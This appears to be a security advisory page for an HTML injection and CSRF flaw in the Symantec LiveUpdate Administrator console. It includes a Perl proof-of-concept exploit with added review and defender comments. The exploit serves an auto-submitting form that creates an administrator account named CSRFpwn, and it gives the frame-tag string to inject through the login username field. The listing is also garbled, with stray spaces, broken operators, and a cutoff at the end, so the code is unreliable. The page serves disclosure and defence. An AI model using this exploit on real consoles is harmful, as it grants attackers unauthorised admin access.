Symantec LiveUpdate is the technology Symantec uses to automatically update its virus definitions and products. The LiveUpdate client ships with each Symantec product and is installed automatically. LiveUpdate regularly connects to the LiveUpdate server to check for new updates to the Symantec products installed on your computer. The Symantec LiveUpdate Administrator management page has an HTML injection vulnerability, which can lead to cross-site scripting or injection of malicious HTML. As the PoC below shows, markup entered in the login username field is rendered when an administrator views the logs, and the injected content can then submit requests to the console from the administrator's browser (CSRF).
[+] Info:
~~~~~~~~~
Symantec LiveUpdate Administrator management GUI HTML injection
[+] Poc:
~~~~~~~~~
001 #! /Usr/bin/perl
002
003 ##
004 # Title: Symantec Live Update Administrator CSRF Exploit
005 # Name: luaCSRF. pl
006 # Author: Nikolas Sotiriu (lofi) <lofi [at] sotiriu.de>
007 #
008 # Use it only for education or ethical pentesting! The author accepts
009 # no liability for damage caused by this tool.
010 #
011 ##
012
013
014 use Socket;
015 use IO: Handle;
016 use Getopt: Std;
017
# Option handling: two switches are declared, -g (payload selector) and
# -h (address of the LiveUpdate Administrator host). Each value falls back to
# usage() when it is missing.
# NOTE(review): the usage text further down also advertises -p, but no such
# switch is declared here and the listener port is fixed later in the script.
018 my % args;
019 getopt (g: h:, \ % args );
020
021 my $ payload = $ args {g} | usage ();
022 my $ victim = $ args {h} | usage ();
023
# NOTE(review): banner() is called but not defined in the part of the listing
# visible on this page.
024 banner ();
025
# Payload selection: $html becomes the HTTP response body that the listener
# below returns to any browser that fetches the injected frame.
# Both payloads depend on the console rendering attacker-supplied markup
# unescaped; HTML-encoding log fields on display removes the injection point.
026 if ($ payload eq "1 "){
027 print "[+] Using the Alert Box payload ";
028 # Alert Box
# Payload 1 is a harmless proof that script from the framed page runs in the
# administrator's browser: it only raises an alert dialog.
029 $ html = <ENDHTML;
030
031 <script language = "JavaScript"> alert (!!! XSS/CSRF vulnerability !!!) </SCRIPT>
032
033
034 ENDHTML
035
036} elsif ($ payload eq "2 "){
037 print "[+] Using the add admin user payload ";
038 # Adds the user CSRFpwn with password 12345678
# Payload 2 is an auto-submitting form that POSTs to /lua/adduser.do on port
# 7070 of the host given with -h. The form carries only static fields and no
# per-session token, so it presumably works because the endpoint accepts a
# state-changing POST on the strength of the administrator's session alone
# (classic CSRF) - confirm against the product.
# userRole=1 is presumably the administrator role (the usage text calls this
# payload "Add the Admin User") - not established by the listing itself.
# Defender notes: requiring an unpredictable anti-CSRF token (or an origin
# check) on adduser.do blocks this request; for detection, review the console
# user list for accounts no administrator created and look for POSTs to
# adduser.do whose Referer/Origin is not the console itself.
039 $ html = <ENDHTML;
040
041 <body onload = "document. csrf. submit ();">
042 <form name = "csrf" action = "http: // $ victim: 7070/lua/adduser. do" method = "post">
043 <input type = "hidden" name = "dispatch" value = "save"/>
044 <input type = "hidden" name = "username" value = "CSRFpwn"/>
045 <input type = "hidden" name = "password" value = "12345678"/>
046 <input type = "hidden" name = "verifyPassword" value = "12345678"/>
047 <input type = "hidden" name = "lastname" value = "junk"/>
048 <input type = "hidden" name = "firstname" value = "junk"/>
049 <input type = "hidden" name = "email" value = "junk@junk.com"/>
050 <input type = "hidden" name = "userRole" value = "1"/>
051 </form>
052 </body>
053
054
055 ENDHTML
056
057}
058
# Listener setup: a plain TCP socket bound to port 80 on every local interface
# (INADDR_ANY), with SO_REUSEADDR set; each step dies with a message on failure.
# The port is hard-coded; nothing in the visible code reads a -p option.
059 my $ protocol = getprotobyname (tcp );
060
061 socket (SOCK, AF_INET, SOCK_STREAM, $ protocol) or die "[-] socket () failed: $! ";
062 setsockopt (SOCK, SOL_SOCKET, SO_REUSEADDR, 1) or die "[-] Cant set SO_REUSEADDR: $! ";
063 my $ my_addr = sockaddr_in (80, INADDR_ANY );
064 bind (SOCK, $ my_addr) or die "[-] bind () failed: $! ";
065 listen (SOCK, SOMAXCONN) or die "[-] listen () failed: $! ";
# The messages below describe the injection point: a frame element pointing at
# this listener is entered as the username on the LUA login form and is
# rendered later, when an administrator opens the log view.
# Defender notes: the trigger is therefore a failed-login log entry whose
# username contains markup (e.g. "<frame"), followed by an outbound HTTP
# request from the administrator's browser to an unfamiliar host at the moment
# the logs are viewed. Both are observable in console logs and proxy/egress logs.
066 warn "[+] waiting for incoming connections on port 80 ...";
067 warn "[+] Enter the following String in the LUA username login field ";
068 warn "[+] (e. q. HTTP/SSH) and wair for the admin to view the Logs ";
069 warn "[+]";
070 warn "[+] <frame src = http: // <LOCAL_ADDRESS>/. html> ";
071
# Serving loop: answers every inbound connection with the selected payload.
# $repeat is set to 1 and never changed in the visible code, so the loop runs
# until the process is stopped.
072 $ repeat = 1;
# $victim is reused here for the peer address; the payload text was already
# built above, before this reassignment.
073 $ victim = inet_aton ("0.0.0.0 ");
074 while ($ repeat ){
075 my $ remote_addr = accept (SESSION, SOCK );
076 my ($ port, $ hisaddr) = sockaddr_in ($ remote_addr );
077 warn "[+] Connection from [", inet_ntoa ($ hisaddr), ", $ port]";
078 $ victim = $ hisaddr;
079 SESSION-> autoflush (1 );
# Reads one line from the client; the request itself is not parsed, so the same
# body is returned whatever path or method was requested.
080 if (<SESSION> ){
# NOTE(review): $http_header is never assigned anywhere in the visible listing,
# so as shown the response consists of $html alone.
081 print SESSION $ http_header. $ html;
082}
083 warn "[+] Connection from [", inet_ntoa ($ hisaddr), ", $ port] finished ";
084 close SESSION;
085}
086
087 sub usage {
088 print $ payload;
089 print "";
090 print "luaCSRF. pl-Symantec lua csrf Exploit ";
091 print "========================================== ===================================== ";
092 print "Usage :";
093 print "$0-g <payload>-h <lua-ip> ";
094 print "Optional :";
095 print "-p <local port to listen on> ";
096 print "-g (1 | 2) <payload to use> ";
097 print "1 <Execute an alert box ";
098 print "2 <Add the Admin User" CSRFpwn "> ";
099 &